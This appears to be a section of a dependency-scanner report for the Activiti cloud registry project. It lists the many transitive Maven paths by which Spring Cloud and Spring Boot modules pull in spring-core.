  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-jackson@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-servlet@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-observation@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-observation@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-observation@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
